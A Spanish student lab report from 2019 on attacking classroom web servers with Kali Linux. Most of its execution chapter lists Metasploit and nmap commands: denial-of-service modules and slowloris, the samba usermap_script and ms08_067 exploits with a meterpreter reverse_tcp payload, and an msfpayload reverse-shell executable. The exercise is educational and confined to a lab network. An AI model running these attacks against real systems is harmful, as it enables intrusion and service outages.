Está en la página 1de 15

INSTITUTO TECNOLÓGICO SUPERIOR ESPÍRITU SANTO

MATERIA:

Redes

TEMA:

Ataque a vulnerabilidades con el sistema operativo

KALI LINUX

AUTORES:

José Briones

Luis Delgado

Kevin Hernández

PROFESOR:

Msc. Jaime Chuchuca

AÑO LECTIVO

2019
INDICE

CAPITULO I .................................................................................... 1
1. INTRODUCCIÓN ..................................................................................................................................... 1
1.1. CARACTERISTICAS DE KALI LINUX ................................................................................................. 2
1.2. DESCARGA DE KALI LINUX............................................................................................................. 2
1.3. INSTALACION DE KALI LINUX ........................................................................................................ 2

CAPITULO II .................................................................................. 3
2. OBJETIVOS DEL PROYECTO .................................................................................................................... 3
2.1. OBJETIVO GENERAL ...................................................................................................................... 3
2.2. OBJETIVO ESPECIFICO ................................................................................................................... 3

CAPITULO III ................................................................................. 4


3. EJECUCIÓN DEL PROYECTO .................................................................................................................... 4
ALUMNO JOSÉ BRIONES ............................................................................................................................ 4
ALUMNO KEVIN HERNANDEZ .................................................................................................................... 5
ALUMNO LUIS DELGADO ........................................................................................................................... 8

CAPITULO IV ............................................................................... 13
4. BIBLIOGRAFIA ...................................................................................................................................... 13
CAPITULO I

1. INTRODUCCIÓN

KALI LINUX

GNU/LINUX DEBIAN

Kali Linux es una distribución de LINUX BACKTRACK que ayuda a realizar Auditorías de
Seguridad y Pruebas de Penetración. Kali es un Sistema Operativo basado en GNU/Linux Debian,
siendo una reedificación completa de BACKTRACK, la cual abarca una gran cantidad de
herramientas que ayudan a capturar información, identificar vulnerabilidades, explotarlas, remontar
privilegios y cubrir huellas.

Kali Linux se incorpora completamente a los estándares de desarrollo de Debian. De hecho, tiene en
funcionamiento toda una nueva infraestructura, siendo todas las herramientas verificadas y
empaquetadas, y se utiliza ahora Git para el CVS

Se ha puesto en funcionamiento toda una nueva infraestructura, todas las herramientas han sido
revisadas y empaquetadas. Contando con más de 300 herramientas de Pruebas de Penetración.
Teniendo algunas características muy importantes a la hora de obtener el Sistemas Operativo.

Una de las opciones que nos da KALI LINUX, es que podemos adaptar diferentes herramientas
para una tare especifica o para un uso generalista, siendo esta de mucha ayuda para realizar tareas
habituales como escuchar música o ver videos y editar documentos o crearlos, sin necesidad de
instalar softwares adicionales.

Desde varios puntos de vista KALI LINUX, es la herramienta perfecta para hackers, que buscan (y
encuentran) los barreras y fisuras en la seguridad de las redes y sistemas informáticos. Claramente
no quiere decir que este orientado a cometer delitos cibernéticos, de hecho, esta direccionada con
herramienta para un análisis forense, con que podríamos descubrir por donde ha sido atacado un
sistema y posiblemente encontrar rastros del atacante.

1
1.1. CARACTERISTICAS DE KALI LINUX

 Siempre será gratuito


 Árbol Git Open Source
 Cumple con FHS (Filesystem Hierarchy Standart)
 Amplio soporte para dispositivos inalámbricos
 Parches al Kernel para inyección.
 Entorno de desarrollo seguro
 Paquetes y repositorios firmados con GPG
 Varios lenguajes (C, Python, Java, Perl y otros)
 Completamente personalizable
 Soporte ARMEL y ARMHF

1.2. DESCARGA DE KALI LINUX

KALI LINUX puede ser descargado en diferentes arquitecturas, como i386, amd64 y armel, armhf.

Solo para la arquitectura i386 puede ser descargado en dos formas en una imagen ISO o en una
máquina virtual para VMware. Además, podemos descargarlo mediante descarga directo o Torrent.

Su distribución puede ser descargada desde el siguiente link:

http://www.kali.org/downloads/

1.3. INSTALACION DE KALI LINUX

Lo podemos instalar en un disco duro, y realizar un arranque dual con un Sistema Operativo
Windows o instalarlo como unidad USB con o sin persistencia (guardar los procesos, información
de nuestro proyecto) e instalarlo en un disco cifrado. Podemos encontrar la información detallada
sobre la instalación de Kali Linux en la siguiente página:

http://docs.kali.org/category/installation

2
CAPITULO II

2. OBJETIVOS DEL PROYECTO

2.1. OBJETIVO GENERAL

Utilizando la distribución de KALI LINUX, se pretende motivar a los estudiantes sobre lo


importante que es la seguridad informática, mediante un ejercicio de ataque con KALI LINUX
conformado por los estudiantes: Briones, Hernández y Delgado, frente a los Administradores con
sus respectivas páginas web subidas en un servidor, mediante una red privada en el Laboratorio de
Redes.

2.2. OBJETIVO ESPECIFICO

Investigar y practicar el uso de KALI LINUX para realizar escaneos en busca de los dispositivos
conectados a la Red Privada: 198.168.100.0/24, recolectando información de un objetivo
seleccionado, en busca de puerto abiertos y vulnerabilidades para así continuar con los ataques que
cada alumno desee realizar, por consiguiente, lograr el objetivo de vulnerar a un administrador.

3
CAPITULO III

3. EJECUCIÓN DEL PROYECTO

ALUMNO JOSÉ BRIONES


REPORTE / COMANDOS

#ifconfig (Verificar dirección de Red y dirección ip)

#cd Desktop/Proyecto (Guardar información en la es dirección)

#service postgresql start (Iniciar base de datos para utilizar Metasploit)

#service postgresql status (Verificar la activación de la base de datos)

#msf init (Iniciar metasploit)

#msf console (Ejecutar metasploit)

#db_status (Estado de la base de datos)

#workspace -a Proyecto_Final (Cree una instancia separada para no confundirme


en el caso de tener diferentes proyectos)

#db_nmap -sP -O 192.168.100.0/24 (Escanee la red en busca de los dispositivos


conectados con su respectivo sistema operativo)

#db_nmap -sV -O -p- 192.168.100.1 (Analice y confirme su sistema operativo (-O), y


sus los puertos abiertos (-p-)

#db_nmap -sV -O –script vuln 192.168.100.1 (Escaneo los puertos y busco vulnerabilidades en
los puertos con (--script vuln)

#search CVE: CVE-2007-6750 (En mis resultados obtuve una vulnerabilidad en el


puerto 80, en este caso metasploit contaba con
dicho exploit en su base de datos)

#use auxiliary/dos/http/slowloris (Use el exploit para ver sus requerimientos con el


siguiente comando)

#show options (Verifique sus requisitos en este caso solo me pidió


el IP de mi objetivo)

#set rhosts 192.168.100.1 (Luego de ingresarlo podía ejecutar mi exploit)

#exploit (Finalmente ejecute mi exploit, y logre que el


servidor del administrador sea inaccesible)

4
ALUMNO KEVIN HERNANDEZ
REPORTE DE ATAQUE

- Abrimos la Terminal

Lo primero que se debe hacer es identificar en que red estamos trabajando con el

#ifconfig.

Lo siguiente seria:

#nmap -sV

Es para identificar las IP que ping están en la red 192.168.56.100-200 a la vez especificamos el
rango de la red, es básico si queremos iniciar los ataques.

Luego iniciamos el metasploit desde la terminal con el:

#msfconsole

Lo siguiente para verificar los servicios en funcionamiento en cada puerto especifico y la versión
del sistema que está usando:

#nmap -sV -n -p (rango 100-200 max 65535) (Dirección IP)

Después de este procedimiento iniciamos el ataque desde el metasploit:

#use exploit/multi/samba/usermap_script

#set RHOST (IP victima)

#run

Este código es para entrar como Administrador:

#use exploit/multi/http/manageengine_search_sqli

#set RHOST (IP victima)192.168.100.1

#run

Luego ya estando dentro probamos con un screenshot si tuvimos éxito se crearía un archivo con la
pantalla del usuario, luego vamos a la ruta donde se guardó el mismo y visualizamos el mismo.

Otro Ataque

 ATAQUE Dos

Abrimos Metasploit, herramienta de Kali.

Cuando cargue usamos el siguiente código:

5
#use auxiliary/dos/tcp/synflood (tipo de ataque que vamos a utilizar)

Luego establecemos a la víctima (ip) con el siguiente código:

#set RHOST 192.168.100.1 (IP)

Luego hacemos el ataque ejecutándolo con el siguiente código:

#exploit

Este ataque ayuda a que se caiga la página web que por ejemplo salga un mensaje que no tiene
acceso.

Otro Ataque

 DENEGACION DE SERVICIO APACHE TOMCAT CON METASPLOIT

En consola ponemos

#msfconsole (Para iniciar el metasploit)

Luego ponemos:

#search tomcat (buscamos el auxiliar)

Luego usamos el siguiente auxiliar:

#use auxiliary/dos/http/apache_tomcat_transfer_encoding

#show options (vemos las opciones requeridas)

Cambiamos las opciones por:

#set RHOST (DIRECCION IP VICTIMA)

#set RPORT 8180

Y luego mandamos a ejecutar el ataque con:

#run

Sino funciona ponemos otra vez:

#show options

Luego de verificar que están correctamente la ip víctima y el puerto poner:

#set rlimit 99999

#run

Si vamos al explorador y se actualiza veremos que no está funcionando el servicio.

6
Otro Ataque

En la terminal usamos el siguiente código:

#msfpayload windows/meterpreter/reverse_tcp LHOST= (Nuestra IP) LPORT=8080 x >


/root/Desktop/prueba.exe

Al crear el archivo debemos enviarlo al pc víctima, pero en este caso es complicado ejecutar el
mismo.

Otro ataque ddos

Vamos a la terminal

Ya descargado lo que vamos a usar el sloworis para mandar varios paquetes a una dirección:

Vamos a la ruta en donde se encuentra el archivo:

#cd Desktop

Luego vamos al archivo:

#cd slowloris.pl

Luego Iniciamos el ataque con el siguiente código:

#perl slowloris.pl -dns (url de la página que vas hacer ping) www.192.168.56.200 -port 80 -timeout
1 -num 10000 -cache

Para pararlo cntrl c, pero se enviarían los paquetes que indicaste para hacer más lenta a la página y
en el mejor de los casos bajarla.

7
ALUMNO LUIS DELGADO
REPORTE DE PROYECTO

 MI DOCUMENTACION

Comandos básicos

#chat > ejemplo.txt ///creo un documento de texto

#ctrl d ////para guardar

Configurar con la base de datos para trabajar de manera ordenada

#msfdb init

#service postgresql start

#msfconsole

#db_status

#workspace

#workspace -a p + nombre

rastreo de redes y creación de documento XML

# nmap -A 192.168.1.1/24 -oX /root/Escritorio/scanNmap

#db_import /root/Escritorio/scanNmap

Módulos de Metasploit

#search arp_sweep

#use auxiliary/scanner/portscan/syn

#show options

#set rhosts 192.168.1.3

#use auxiliary/admin/tikiwiki/tikidblib linux 80

#use exploit/windows/smb/ms08_067_netapi windows 445

#payload

#set PAYLOAD windows/meterpreter/reverse_tcp

Conexión con victima:

Background enviar sesión iniciada a segundo plano:

8
#sesions -l lista las sesiones

#sesions -i 1 vuelve a sesión por requerimiento

#search -f *.jpg busca imágenes

#shell

Ataque ddos

perl slowloris.pl + dominio

Realice un escaneo de puertos abiertos en la ip especifica

#nmap -sS 192.168.100.1

Starting Nmap 7.70 (https://nmap.org) at 2019-07-29 19:56 -05

Nmap scan report for 192.168.100.1

Host is up (0.00081s latency).

Not shown: 994 closed ports

PORT STATE SERVICE

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

2968/tcp open enpp

3306/tcp open mysql

MAC Address: B4:B6:86: E4:C6:74 (Unknown)

 ATAQUE AL PUERTO 445

#msf5 > use exploit/windows/smb/ms08_067_netapi

#msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

9
Name Current Setting Required Description

---- --------------- -------- -----------

RHOSTS yes The target address range or CIDR identifier

RPORT 445 yes The SMB service port (TCP)

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name

-- ----

0 Automatic Targeting

#msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.100.1

#rhost => 192.168.100.1

#msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

#PAYLOAD => windows/meterpreter/reverse_tcp

#msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOSTS 192.168.100.1 yes The target address range or CIDR identifier

RPORT 445 yes The SMB service port (TCP)

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

#Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC teread yes Exit technique (Accepted: '', seh, thread, process, none)

10
LHOST yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic Targeting

#msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.100.3

#lhost => 192.168.100.3

#msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.100.3:4444

[-] 192.168.100.1:445 - Connection reset during login

[-] 192.168.100.1:445 - This most likely means a previous exploit attempt caused
the service to crash

[*] Exploit completed, but no session was created.

El primer ataque no funciono.

 PROCEDI A HACER UN ATAQUE DDOS

root@kali: ~# cd Escritorio

root@kali: ~/Escritorio# cd slowloris.pl

root@kali: ~/Escritorio/slowloris.pl# perl slowloris.pl


http://192.168.100.1/mi_paginaweb/paginaweb.html

Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client by Laera Loris

Usage:

perl slowloris.pl -dns [www.example.com] -options

Type 'perldoc slowloris.pl' for help with options.

root@kali: ~/Escritorio/slowloris.pl# cd.

root@kali: ~/Escritorio# cd.

11
root@kali: ~# ping 192.168.100.2

PING 192.168.100.2 (192.168.100.2) 56(84) bytes of data.

--- 192.168.100.2 ping statistics ---

packets transmitted, 0 received, 100% packet loss, time 149ms

12
CAPITULO IV

4. BIBLIOGRAFIA

 http://www.reydes.com/archivos/Kali_Linux_v2_ReYDeS.pdf
 https://www.udemy.com/kali-linux-para-principiantes-y-ethical-hacking-basico/
 https://www.youtube.com/watch?v=UKkMP2UFs_s&vl=es
 https://computerhoy.com/paso-a-paso/software/que-es-kali-linux-que-puedes-hacer-
41671
 https://www.youtube.com/watch?v=QIW9NYWP7uA
 https://www.youtube.com/watch?v=aS_9UTv8rck
 https://www.creadpag.com/2018/05/ataques-ddos-en-kali-linux.html

13

También podría gustarte